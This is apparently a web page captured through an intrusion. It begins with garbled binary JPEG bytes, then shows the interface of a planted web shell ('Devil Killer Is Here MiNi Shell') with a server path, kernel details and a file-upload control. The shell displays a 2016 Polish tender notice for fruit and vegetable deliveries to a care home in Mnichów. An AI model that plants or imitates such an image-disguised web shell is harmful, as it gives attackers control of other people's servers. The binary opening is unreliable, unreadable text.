JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161130/354973-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.powiajedrzejow.pl (-jednostki organizacyjne powiatu,-dom pomocy społecznej,-zamówienia publiczne,-dostawy)' target='_blank'>http://www.powiajedrzejow.pl (-jednostki organizacyjne powiatu,-dom pomocy społecznej,-zamówienia publiczne,-dostawy)</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 354973 - 2016
              z dnia 2016-11-30 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Jędrzejów: Przedmiotem zamówienia są : sukcesywne dostawy w 2017 r., do Domu Pomocy Społecznej w Mnichowie, warzyw i owoców, wraz z dowozem i wniesieniem. <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Dom Pomocy Społecznej w Mnichowie, krajowy numer identyfikacyjny
              29116843200000, ul.
              Mnichów 
              135,
              28300  
              Jędrzejów, woj.
              świętokrzyskie, państwo
              Polska, tel.
              41 38-73-512, e-mail
              dpsmnichow@gmail.com, faks
              41 38-73-512.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: jednostka organizacyjna samorządu terytorialnego (Powiatu Jędrzejwskiego)</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.powiajedrzejow.pl (-jednostki organizacyjne powiatu,-dom pomocy społecznej,-zamówienia publiczne,-dostawy)</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Dom Pomocy Społecznej w Mnichowie, Mnichów135, 28-300 Jędrzejów, woj.świętokrzyskie</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przedmiotem zamówienia są : sukcesywne dostawy w 2017 r., do Domu Pomocy Społecznej w Mnichowie, warzyw i owoców, wraz z dowozem i wniesieniem. <br /><b>Numer referencyjny: </b>1/WO/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia są : sukcesywne dostawy w 2017 r. , do Domu Pomocy   
       Społecznej w Mnichowie  warzyw i owoców, wraz z dowozem i wniesieniem.

       Przedmiot zamówienia dotyczy warzyw i owoców  o standardach jakościowych   
       które Zamawiający odniósł  do  istotnych cech  przedmiotu zamówienia, które
       zamieścił w  formularzach cenowych  dla poszczególnych kwartałów 2017 r.
Przedmiot zamówienia stanowią dostawy (łączne) we wszystkich kwartałach 2017 r. tj. kwartału I,II,III,IV.
Dokładne nazwy artykułów (asortymentów) przedmiotu zamówienia, ich dane,     
       przewidywane ilości dostaw   Zamawiający określił  w treści   poszczególnych    
       załączników Nr.3  Nr.6  do SIWZ (formularzach cenowych dla poszczególnych  
       kwartałów 2017 r.).
Maksymalne ilości artykułów (asortymentów) przedmiotu zamówienia,   
       Zamawiający określił działając z należytą starannością) w formularzach cenowych dla  
       poszczególnych kwartałów 2017 r. (Zał.Nr.3  6 do SIWZ). Zamawiający zastrzega sobie 
       prawo do dostosowania tych ilości do  swoich potrzeb (z uwzględnieniem konsekwencji 
       rachunkowych w wynagrodzeniu umownym   do max. jego wartości wynikającej              
       z  umowy), bez prawa do roszczeń z tego tytułu przez Wykonawcę.
Przedmiotem zamówienia są  łączne dostawy w 2017 r. (w kwartałach I; II; III i IV       
       2017 r.), a mianowicie :

  a)  kwartał I  2017 r.  - dostawy : warzywa świeże i przetworzone, świeże warzywa   
       szklarniowe lub tunelowe, świeże grzyby, ziemniaki, świeże owoce /zgodnie z  
       formularzem cenowym kwartału I 2017 r., stanowiącym Zał. Nr 3 do SIWZ/. 
       Dostawy dotyczą : 
    - warzyw  /CPV 03221000-6/ : kapusta biała, kapusta pekińska, kapusta czerwona,   
      brokuł, ogórek szklarniowy lub tunelowy, marchew, seler, por, cebula, burak czerwony,
      pietruszka, cukinia, pomidory szklarniowe lub tunelowe, papryka czerwona, papryka
      zielona, koperek, natka, rzodkiewka, szczypiorek, sałata, grzyby (pieczarki), 
    - ziemniaków /CPV 03212100-1/ : ziemniaki jadalne,
    - warzyw przetworzonych /CPV 15331000-7/ : warzywa kiszone (ogórki, kapusta),
    - owoce inne niż tropikalne /CPV 03222300-6/ : jabłka deserowe.
                                                                         
      Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 3 /formularzu 
      cenowym kwartału I 2017 r./.

  b) kwartał II  2017 r.  - dostawy : warzywa świeże i przetworzone, świeże warzywa    
      szklarniowe lub tunelowe, świeże grzyby, ziemniaki, świeże owoce /zgodnie z formularzem  
      cenowym kwartału II 2017 r., stanowiącym Zał. Nr 4 do SIWZ/. 
       Dostawy dotyczą : 
    - warzyw  /CPV 03221000-6/ : kapusta biała, kapusta pekińska, kapusta czerwona, 
      brokuł,  kalafior, fasolka szparagowa, ogórek gruntowy, ogórek szklarniowy lub tunelowy,  
      marchew  seler, por, cebula, burak czerwony, pietruszka, cukinia, pomidory szklarniowe  
      lub tunelowe, papryka czerwona, papryka zielona, koperek, natka, rzodkiewka, 
      szczypiorek, sałata ,  botwina, grzyby /pieczarki/, 
    - ziemniaków /CPV 03212100-1/ : ziemniaki jadalne,
    - warzyw przetworzonych /CPV 15331000-7/ : warzywa kiszone (ogórki, kapusta),
    - owoce inne niż tropikalne /CPV 03222300-6/ : jabłka deserowe, truskawki, gruszki.
                                                                         
      Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 4 /formularzu 
      cenowym kwartału II 2017 r./.

  c) kwartał III  2017 r.  - dostawy : warzywa świeże i przetworzone, świeże warzywa
     szklarniowe lub tunelowe, świeże grzyby, ziemniaki, świeże owoce /zgodnie z formularzem  
     cenowym kwartału III 2017 r., stanowiącym Zał. Nr 5 do SIWZ/. 
     Dostawy dotyczą : 
  - warzyw  /CPV 03221000-6/ : kalafior, kapusta biała,kapusta młoda, kapusta pekińska, 
     kapusta czerwona, ogórek gruntowy, marchew, seler, por, cebula, burak czerwony, 
     pietruszka, fasolka szparagowa, cukinia, pomidory gruntowe, pomidory szklarniowe lub 
     tunelowe, papryka czerwona, papryka zielona, koperek, natka, rzodkiewka, szczypiorek,
     sałata, botwina, brokuł, grzyby (pieczarki), 
  -  ziemniaków /CPV 03212100-1/ : ziemniaki jadalne, ziemniaki młode,
  -  warzyw przetworzonych /CPV 15331000-7/ : warzywa kiszone (ogórki, kapusta),
  -  owoce inne niż tropikalne /CPV 03222300-6/ : śliwki, wiśnie, truskawki, jabłka 
     deserowe,gruszki
                                                                         
     Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 5 /formularzu 
     cenowym kwartału III 2017 r./.

 d) kwartał IV  2017 r.  - dostawy : warzywa świeże i przetworzone, świeże warzywa
     szklarniowe lub tunelowe, świeże grzyby, ziemniaki, świeże owoce /zgodnie z formularzem  
     cenowym kwartału IV 2017 r., stanowiącym Zał. Nr 6 do SIWZ/. 
     Dostawy dotyczą : 
  -  warzyw  /CPV 03221000-6/ : kalafior, kapusta biała, kapusta pekińska, kapusta  
     czerwona, 
     ogórek szklarniowy lub tunelowy, marchew, seler, por, cebula, burak czerwony,
     pietruszka, fasolka szparagowa, cukinia, pomidory szklarniowe lub tunelowe, papryka
     czerwona, papryka zielona, koperek, natka, rzodkiewka, szczypiorek, sałata, brokuł, 
     grzyby (pieczarki), 

 - ziemniaków /CPV 03212100-1/ : ziemniaki jadalne, 
 - warzyw przetworzonych /CPV 15331000-7/ : warzywa kiszone (ogórki, kapusta),
 - owoce inne niż tropikalne /CPV 03222300-6/ : jabłka deserowe, gruszki.
                                                                         
   Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 6 /formularzu 
   cenowym kwartału IV 2017 r./.

  Przedmiot zamówienia został szczegółowo opisany w Zał. Nr 3 - 6 do niniejszej SIWZ  
  /formularzach cenowych kwartału I; II; III; IV 2017 r./, które łącznie /razem/ określają   
  /stanowią/ przedmiot zamówienia.  <br /><br /><b>II.5) Główny kod CPV: </b>03100000-2<br /><b> Dodatkowe kody CPV:</b>03221000-6,
                03212100-1,
                15331000-7,
                03222300-6,
                <br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">odpisu z właściwego rejestru lub z centralnej ewidencji i informacji 
      o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
      rejestru lub ewidencji, w celu potwierdzenia braku podstaw  wykluczenia  na   
      podstawie  art. 24 ust.5 pkt 1 ustawy Pzp, w zw. z art.25 ustawy Pzp.
      Wskazany Wykonawca (którego oferta została najwyżej oceniona), składa na  
      wezwanie Zamawiającego w/w dokument (aktualny na dzień złożenia oświadczeń lub   
      dokumentów) , w terminie wyznaczonym przez Zamawiającego (nie  krótszym niż         
      5 dni od daty otrzymania wezwania), oraz (o ile dotyczy w/w Wykonawcy) :
  -    gdy wskazany w/w Wykonawca, polega na zdolnościach lub sytuacji innych  podmiotów na
       zasadach określonych w art. 22a ustawy Pzp, w/w dokument w/w Wykonawca składa również               
       w odniesieniu do podmiotu udostępniającego zasoby.

 -     gdy  wskazany w/w Wykonawca, zamierza powierzyć podwykonawcy wykonanie części
       przedmiotu zamówienia, a który to podwykonawca nie jest podmiotem na którego zdolnościach  
        lub sytuacji w/w Wykonawca polega na zasadach określonych w art. 22a ustawy Pzp, w/w 
       dokument w/w Wykonawca składa również w odniesieniu do podwykonawcy.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Wypełniony formularz oferty - w/g wzoru określonego w Załączniku Nr 1 do SIWZ 
    

2. Wypełniony i wyliczony we wszystkich wierszach i kolumnach, oraz podsumowany
       w kolumnie Nr 3 i kolumnie Nr 4, Formularz Wyliczenia wartości netto/ceny brutto oferty  
       Wykonawcy - w/g wzoru stanowiącego Załącznik Nr 2 do SIWZ.
       

3. Wypełnione  i wyliczone  we wszystkich wierszach i kolumnach formularze  cenowe  
       w/g wzorów określonych w Załącznikach Nr 3-6 do SIWZ.
      

4. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia
       publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 
       zamówienia publicznego w przypadku, gdy wykonawcę reprezentuje pełnomocnik. 

 
5. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia
       publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie
       zamówienia publicznego, wykonawców występujących wspólnie. 

      
      (Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców     
       ubiegających się wspólnie o udzielenia zamówienia. Podpisy muszą być złożone przez    
       osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze 
       lub ewidencji Wykonawców ) 
6. W celu wykazania braku podstaw do wykluczenia Wykonawcy w okolicznościach        
           o których mowa w art. 24 ust.1 pkt. 23 ustawy Pzp, Wykonawca w terminie 3 dni    
           od dnia przekazania informacji o ofertach złożonych (o której mowa w art. 86 ust.5 
           ustawy Pzp), zamieszczonej na stronie internetowej na której opublikowano SIWZ, 
           przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności 
           do tej samej grupy kapitałowej. W przypadku przynależności do tej  samej grupy 
           kapitałowej, Wykonawca może przekazać dowody że powiązania z  innym 
           wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
7. oświadczenie Wykonawcy/ów o spełnianiu warunków udziału w postępowaniu -   
           w/g wzoru określonego w  Załączniku Nr 7 do SIWZ,
           Oświadczenie (aktualne na dzień składania ofert), Wykonawca/y załącza/ją do  
           składanej  oferty.                                                                                                           
           Jeżeli w/w Wykonawca/y, powołuje/ją się na zasoby innych  podmiotów, w celu 
           wykazania spełnienia, w zakresie, w jakim powołuje/ją się na ich zasoby, warunków  
           udziału w postępowaniu, w/w Wykonawca/y :                                                                 
     a)   w oświadczeniu j.w, zamieszcza/ją informację o tych podmiotach.
           
     b)  składają dokument o którym mowa w pkt. 6.3.2 SIWZ.
8. oświadczenie Wykonawcy/ów o braku podstaw do wykluczenia z postępowania       
      w okolicznościach o których mowa w art. 24 ust.1,oraz art.24 ust.5 pkt.1 ustawy 
      Pzp -
    - w/g  wzoru określonego w  Załączniku Nr 8 do SIWZ.
      Oświadczenie (aktualne na dzień składania ofert), Wykonawca/y załącza/ją do   
      składanej oferty.
           W sytuacji gdy :
         - w/w Wykonawca/y, powołuje/ją się na zasoby innych podmiotów, w celu 
           wykazania braku istnienia wobec nich podstaw wykluczenia, w zakresie, w jakim 
           powołuje/ją się na ich zasoby, w/w Wykonawca/y w oświadczeniu j.w zamieszcza/ją
           informację o tych podmiotach.
         - w/w Wykonawca/y, zamierza/ją powierzyć wykonanie części zamówienia
           podwykonawcom, w celu wykazania braku istnienia wobec podwykonawców  
           podstaw wykluczenia z udziału w postępowaniu, w/w Wykonawca/y w oświadczeniu 
           j.w zamieszcza/ją informację o tych podwykonawcach.
9. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
           Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 7.2.SIWZ 
           składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub   
           miejsce  zamieszkania, potwierdzające odpowiednio, że :
-     nie otwarto jego likwidacji ani nie ogłoszono upadłości-wystawiony nie wcześniej niż
      6 miesięcy przed upływem terminu składania ofert,


Jeżeli w  kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub w
           kraju, w którym miejsce zamieszkania mają osoby,których dotyczą dokumenty ,
           nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je    
           dokumentem zawierającym oświadczenie Wykonawcy, ze wskazaniem osób   
           uprawnionych do reprezentacji Wykonawcy, złożone przed właściwym organem  
           sądowym, administracyjnym albo organem samorządu zawodowego lub  
           gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym 
           wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Termin  
           wystawienia dokumentów jw.  


</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
